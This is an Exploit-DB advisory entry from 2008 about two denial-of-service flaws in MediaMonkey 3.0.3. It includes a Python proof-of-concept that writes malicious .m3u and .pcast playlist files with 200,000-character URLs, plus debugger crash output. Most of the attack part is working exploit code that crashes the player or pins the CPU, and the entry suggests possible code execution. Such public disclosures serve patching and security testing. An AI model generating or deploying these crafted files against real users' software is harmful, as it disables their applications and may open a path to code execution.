MediaMonkey 3.0.3 - URI Handling Multiple Denial of Service Vulnerabilities

EDB-ID:

32054

CVE:

N/A


Author:

Shinnok

Type:

dos


Platform:

Windows

Date:

2008-07-16


source: https://www.securityfocus.com/bid/30251/info

MediaMonkey is prone to two denial-of-service vulnerabilities because it fails to handle user-supplied input.

An attacker can exploit these issues to crash the application. Given the nature of these vulnerabilities, the attacker may also be able to execute arbitrary code, but this has not been confirmed.

MediaMonkey 3.0.3 is vulnerable; other versions may also be affected. 

#!/usr/bin/python
# MediaMonkey 3.0.3 [.m3u] & [.pcast] url handling DOS
#This script will generate 2 files called evil.m3u and evil.pcast.
#In both cases the vulnerability resides in failure to handle overly long urls.
#[.m3u descr]
#The vulnerability exists in several places within the url.In this case
#we are going to use the file name part of the url.
#Open evil.m3u in MediaMonkey then play it.Or double click the .m3u file
#and it will try to play automatically.
#Debugger output on crash:
#              ----------------------------------------------------------------
#              Exception C0000005 (ACCESS_VIOLATION reading [31F518F0])
#              ----------------------------------------------------------------
#              EAX=FFFFFFFF: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
#              EBX=00000002: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
#              ECX=0CF203D9: 2F 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
#              EDX=0CF203D9: 2F 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
#              ESP=0CC5AF38: 31 32 37 2E 30 2E 30 2E-31 2F 41 41 41 41 41 41
#              EBP=0CCBFF7C: B4 FF CB 0C 18 63 54 03-B8 49 55 03 08 3F 5B 03
#              ESI=25031517: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
#              EDI=0CCBFF5D: 03 F2 0C D9 03 F2 0C 26-00 00 00 48 00 F1 0C 78
#              EIP=035445A8: 8A 14 0E 8D 04 0E 80 FA-2F 0F 84 13 01 00 00 80
#                            --> MOV DL,[ESI+ECX*1]
#              ----------------------------------------------------------------
#
#[.pcast descr]
#Just as in the .m3u case the vulnerability manifests in several places within
#the url.In this case we will use the filename too.
#Double click or "open with" evil.pcast in MediaMonkey.The program will 
#start consuming 100% cpu thus becaming unusable.
#
#Found by: Shinnok raydenxy [at] yahoo dot com
m3u = 'http://127.0.0.1/'
badstr = 'A' * 200000
m3u += badstr
m3u += '.mp3'

f = open('evil.m3u','wb')
f.write(m3u);
f.close

pcast = '<?xml version="1.0" encoding="UTF-8"?>\n<pcast version="1.0">\n<channel>\n<link rel="feed" type="application/rss+xml" href="http://127.0.0.1/'
badstr = 'A'* 200000
pcast += badstr
pcast += '.xml"/></link>\n</channel>\n</pcast>\n'

f = open('evil.pcast','wb')
f.write(pcast);
f.close